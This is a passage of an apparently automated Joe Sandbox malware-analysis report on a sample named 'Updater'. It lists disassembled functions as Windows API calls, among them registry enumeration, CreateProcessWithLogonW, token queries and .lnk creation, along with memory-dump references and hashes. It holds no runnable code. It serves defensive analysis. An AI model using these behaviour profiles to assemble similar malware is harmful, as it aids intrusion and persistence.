                                                                                                    • Part of subcall function 006EF3E6: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,00000000,?,00008000,00008000,?,0073D9C7,00008000,?,?), ref: 006EF435
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                                  • String ID:
                                                                                                  • API String ID: 1923757996-0
                                                                                                  • Opcode ID: 27f0b601749d2a63fa8d1639cb74985aebb289f04deea109c9b193df2b9c08f3
                                                                                                  • Instruction ID: 1be751234b7f0ceefbcbecdad64830ffde1df7f307bcb29726d041b442ecb10d
                                                                                                  • Opcode Fuzzy Hash: 27f0b601749d2a63fa8d1639cb74985aebb289f04deea109c9b193df2b9c08f3
                                                                                                  • Instruction Fuzzy Hash: 10A12170604340AFC324DF24C895E6A7BA6AF85304F14894CF8565B3A3DBB5ED4ACB92
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006F8204,006F8204,?,?,?,0070627D,00000001,00000001,71E85006), ref: 00706086
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0070627D,00000001,00000001,71E85006,?,?,?), ref: 0070610C
                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,71E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00706206
                                                                                                  • __freea.LIBCMT ref: 00706213
                                                                                                    • Part of subcall function 0070282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,006F0445,?,?,006DFA72,00000000,?,?,?,006D1188,?), ref: 00702860
                                                                                                  • __freea.LIBCMT ref: 0070621C
                                                                                                  • __freea.LIBCMT ref: 00706241
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1414292761-0
                                                                                                  • Opcode ID: cf363579b58afa1f25726377e2ecbb1d0cae7d089bc30cc6fab2518f706ec3e2
                                                                                                  • Instruction ID: efe785c69dd41aa06e3da05cf157643f2e3c5810facfe49cfe3e8e34503050cd
                                                                                                  • Opcode Fuzzy Hash: cf363579b58afa1f25726377e2ecbb1d0cae7d089bc30cc6fab2518f706ec3e2
                                                                                                  • Instruction Fuzzy Hash: 0251C272A4021AEBDB258F64CCA5EBB77E9EB54750F154329FD04DA2C0EB38DCA08650
                                                                                                  APIs
                                                                                                  • VariantInit.OLEAUT32(00755FF9), ref: 0073085D
                                                                                                  • SysAllocString.OLEAUT32(00000001), ref: 00730904
                                                                                                  • VariantCopy.OLEAUT32(00730B20), ref: 0073092D
                                                                                                  • VariantClear.OLEAUT32(00730B20), ref: 00730951
                                                                                                  • VariantCopy.OLEAUT32(00730B20,00000000), ref: 00730955
                                                                                                  • VariantClear.OLEAUT32(00755FE5), ref: 0073095F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                                                                  • String ID:
                                                                                                  • API String ID: 3859894641-0
                                                                                                  • Opcode ID: 3ed2b8d29a237bc4c3cc935667ae9792319647cdc5a7c470060461e4d9e8f542
                                                                                                  • Instruction ID: 8f4f9842ce1beb9d5f147e5d215698b462ef76a06534de2eb39801b6b4f19b4f
                                                                                                  • Opcode Fuzzy Hash: 3ed2b8d29a237bc4c3cc935667ae9792319647cdc5a7c470060461e4d9e8f542
                                                                                                  • Instruction Fuzzy Hash: 9651A031A10304DBFF64AF64E4A9739B3A5AF45710F20D45AE80ACF297EA789C40CBD5
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                    • Part of subcall function 0075D398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075C0AE,?,?), ref: 0075D3B5
                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075C6CA
                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075C725
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0075C76A
                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0075C799
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0075C7F3
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0075C7FF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2678008712-0
                                                                                                  • Opcode ID: f8cbb276b71e687838177823a6b6d42daf01e0d51764eec9a54d03f51136c197
                                                                                                  • Instruction ID: 7f031da5d239eca4bcdd0aa9b0a2df4979ba675111e9bf32430011b0018b42b4
                                                                                                  • Opcode Fuzzy Hash: f8cbb276b71e687838177823a6b6d42daf01e0d51764eec9a54d03f51136c197
                                                                                                  • Instruction Fuzzy Hash: C9819F30618341AFD715DF24C884E6AB7E5FF88308F14885DF8564B2A2DB75ED09CB91
                                                                                                  APIs
                                                                                                  • ShowWindow.USER32(007A2890,00000000,007A2890,00000000,00000000,007A2890,?,00728EBD,00000000,?,00000000,?,?,00728E87,00000004,00000000), ref: 00768C1B
                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00768C3F
                                                                                                  • ShowWindow.USER32(007A2890,00000000), ref: 00768C9F
                                                                                                  • ShowWindow.USER32(00000000,00000004), ref: 00768CB1
                                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 00768CD5
                                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00768CF8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 642888154-0
                                                                                                  • Opcode ID: 24d93f0d6ed982c16ce354ecd2a9817434d0bd6f992f3acd75e22cab73891880
                                                                                                  • Instruction ID: e046c603c23d351e66b4b3e8b88337d6fae5cb6f8ee3b08ea365cf5bcac786de
                                                                                                  • Opcode Fuzzy Hash: 24d93f0d6ed982c16ce354ecd2a9817434d0bd6f992f3acd75e22cab73891880
                                                                                                  • Instruction Fuzzy Hash: 76417430601244EFDB65CF14C499B957BE1FB05314F1842E9ED5A8F2A2CB75A845CB72
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 007470B5
                                                                                                  • CoInitialize.OLE32(00000000), ref: 00747219
                                                                                                  • CoCreateInstance.OLE32(00770CAC,00000000,00000001,00770B1C,?), ref: 00747232
                                                                                                  • CoUninitialize.OLE32 ref: 007474D6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                  • String ID: .lnk
                                                                                                  • API String ID: 886957087-24824748
                                                                                                  • Opcode ID: 01745d5e91dd5a1da2c50056018d866c19004baf337d31460c04ff1fbfbaffdb
                                                                                                  • Instruction ID: af56869219767ad239ed39010f39e23de2528f0756db4ec827e9dd9738d728bd
                                                                                                  • Opcode Fuzzy Hash: 01745d5e91dd5a1da2c50056018d866c19004baf337d31460c04ff1fbfbaffdb
                                                                                                  • Instruction Fuzzy Hash: B8D18971608301AFD304DF14C891E6BBBE9FF94704F04892EF5858B2A1DB71E94ACB92
                                                                                                  APIs
                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00741666
                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0074169D
                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 007416B9
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00741733
                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00741748
                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00741767
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3368777196-0
                                                                                                  • Opcode ID: 99d4eba6e4c260a7671cb3892379cd027919e5d392ba9d7167835c3d8cdcbf8a
                                                                                                  • Instruction ID: dee5e0a528b338f47fac14acae80470620fabdd07fb6ba24815d9d22f761210e
                                                                                                  • Opcode Fuzzy Hash: 99d4eba6e4c260a7671cb3892379cd027919e5d392ba9d7167835c3d8cdcbf8a
                                                                                                  • Instruction Fuzzy Hash: A031C531A00205EFDF00EF54CC85A6EB779FF45710B1580A9FA05AB246DB74DE11CBA4
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E4E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 006E4E6B
                                                                                                  • GetWindowLongW.USER32(01430D50,000000F0), ref: 00768695
                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 007686BA
                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007686D2
                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 007686FF
                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0076870A
                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0074C28E,00000000), ref: 0076871F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2294984445-0
                                                                                                  • Opcode ID: 360ca209d3b42bc242c0b9dd05b266dfaf89d51efe88c6d7d5ea599a2079798b
                                                                                                  • Instruction ID: dfb1b6a49de4c49e9409154aa418b36f19de6c38c37fe1af8c5fbcae9fbe4004
                                                                                                  • Opcode Fuzzy Hash: 360ca209d3b42bc242c0b9dd05b266dfaf89d51efe88c6d7d5ea599a2079798b
                                                                                                  • Instruction Fuzzy Hash: BB21D331620341EFCB648F78CC08A6A37A4EB45364F248729FC23C22E1DE789C50DB16
                                                                                                  APIs
                                                                                                    • Part of subcall function 006D119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D1192,?), ref: 006D11BF
                                                                                                  • _wcslen.LIBCMT ref: 00746441
                                                                                                  • CoInitialize.OLE32(00000000), ref: 00746561
                                                                                                  • CoCreateInstance.OLE32(00770CAC,00000000,00000001,00770B1C,?), ref: 0074657A
                                                                                                  • CoUninitialize.OLE32 ref: 0074659B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                  • String ID: .lnk
                                                                                                  • API String ID: 3172280962-24824748
                                                                                                  • Opcode ID: ddafd9df6f0c19adc37fd33a56e724b14e4caf4fda6fe4ce2978c0f81ac1b63b
                                                                                                  • Instruction ID: b51fd1dc3585544c4cf898a9ee97694c87f863d1793555ad33cdbcf36855e1d8
                                                                                                  • Opcode Fuzzy Hash: ddafd9df6f0c19adc37fd33a56e724b14e4caf4fda6fe4ce2978c0f81ac1b63b
                                                                                                  • Instruction Fuzzy Hash: 26D167B4A043019FCB14DF14C484A2ABBE6FF89714F15885DF89A8B361CB36ED45CB92
                                                                                                  APIs
                                                                                                  • RtlEnterCriticalSection.NTDLL(014BBB35), ref: 0149E164
                                                                                                  • LocalFree.KERNEL32(01449F00,00000000,0149E229), ref: 0149E176
                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,01449F00,00000000,0149E229), ref: 0149E19A
                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000,00008000,01449F00,00000000,0149E229), ref: 0149E1EB
                                                                                                  • RtlLeaveCriticalSection.NTDLL(014BBB35), ref: 0149E219
                                                                                                  • RtlDeleteCriticalSection.NTDLL(014BBB35), ref: 0149E223
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3782394904-0
                                                                                                  • Opcode ID: 52aa9568c1877638949dde596473f3d3c32d141534e92779e877f21f6eeddc84
                                                                                                  • Instruction ID: bd010ff8ad2dc346e5d6bf97d97ca02014a03d08f0c9b93c5223849b079c37a8
                                                                                                  • Opcode Fuzzy Hash: 52aa9568c1877638949dde596473f3d3c32d141534e92779e877f21f6eeddc84
                                                                                                  • Instruction Fuzzy Hash: D0218E74E08248EFEF31EBE9D895B9D7FA4E718310F10449BE554AB7B9C2309940DB21
                                                                                                  APIs
                                                                                                    • Part of subcall function 007320BE: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007320D4
                                                                                                    • Part of subcall function 007320BE: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007320E0
                                                                                                    • Part of subcall function 007320BE: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007320EF
                                                                                                    • Part of subcall function 007320BE: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007320F6
                                                                                                    • Part of subcall function 007320BE: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0073210C
                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00732443), ref: 007328C6
                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007328D2
                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 007328D9
                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 007328F2
                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00732443), ref: 00732906
                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0073290D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                  • String ID:
                                                                                                  • API String ID: 3008561057-0
                                                                                                  • Opcode ID: 9ccb9e21cdda3fe1fc8acbafdd0eae6255d1e819a80ce06c92b218af0c6d2665
                                                                                                  • Instruction ID: ec9c8d72f3e7d0c30ca6218f3a81e98551345091e4f734a34fdf5044678a658d
                                                                                                  • Opcode Fuzzy Hash: 9ccb9e21cdda3fe1fc8acbafdd0eae6255d1e819a80ce06c92b218af0c6d2665
                                                                                                  • Instruction Fuzzy Hash: 5E11B171A11309FFEB249F64DC09BEE7769EF45315F108018E842A7222C77AAD06DBA4
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0073260F
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00732616
                                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00732625
                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00732630
                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0073265F
                                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00732673
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                  • String ID:
                                                                                                  • API String ID: 1413079979-0
                                                                                                  • Opcode ID: 7ad9d02f1d9e674aa75d77d49873654f8543274bfa9fb5245986d995647ff54c
                                                                                                  • Instruction ID: c4751302987d91f74c8735d972d4bdf8034947cb33323246d08e3e0a404bc05f
                                                                                                  • Opcode Fuzzy Hash: 7ad9d02f1d9e674aa75d77d49873654f8543274bfa9fb5245986d995647ff54c
                                                                                                  • Instruction Fuzzy Hash: 58114A7260124DFBEB118F94DD49FDA7BA9EF08304F048054FA05A2161C2BA8E61EB61
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,006F490E,?,00000002,?,006F54B1,006F621F), ref: 00702C4F
                                                                                                  • _free.LIBCMT ref: 00702C82
                                                                                                  • _free.LIBCMT ref: 00702CAA
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,006F621F,00000000), ref: 00702CB7
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,006F621F,00000000), ref: 00702CC3
                                                                                                  • _abort.LIBCMT ref: 00702CC9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 3160817290-0
                                                                                                  • Opcode ID: af246d2d837578ba22550107d2f22802278684ddcb56851cdd4af444f805159b
                                                                                                  • Instruction ID: 14e6e08db4c31e89abe992a8f22781fc69ab585a585a7f789e7aa2c99aa1846f
                                                                                                  • Opcode Fuzzy Hash: af246d2d837578ba22550107d2f22802278684ddcb56851cdd4af444f805159b
                                                                                                  • Instruction Fuzzy Hash: F5F08C37604601E6E3227329AD4EA5F25D99BC1761F358315FA15922E3EE6D8C038136
                                                                                                  APIs
                                                                                                  • GetDC.USER32(00000000), ref: 007361F7
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00736208
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0073620F
                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00736217
                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0073622E
                                                                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00736240
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsDevice$Release
                                                                                                  • String ID:
                                                                                                  • API String ID: 1035833867-0
                                                                                                  • Opcode ID: 442c76a0c1ba27fb5c7155481cf87205681bf4587229848f159b2fe97bde95b3
                                                                                                  • Instruction ID: be1b2dfba187b2f3b648e9bc640fe0ef2a150305045ab0dee68cf1b9083fe395
                                                                                                  • Opcode Fuzzy Hash: 442c76a0c1ba27fb5c7155481cf87205681bf4587229848f159b2fe97bde95b3
                                                                                                  • Instruction Fuzzy Hash: 86014475E00318BBEB209BA59C49A5EBFB8EB48751F008066FA09A7291D674DD10CFA5
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E3B38: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006E3B92
                                                                                                    • Part of subcall function 006E3B38: SelectObject.GDI32(?,00000000), ref: 006E3BA1
                                                                                                    • Part of subcall function 006E3B38: BeginPath.GDI32(?), ref: 006E3BB8
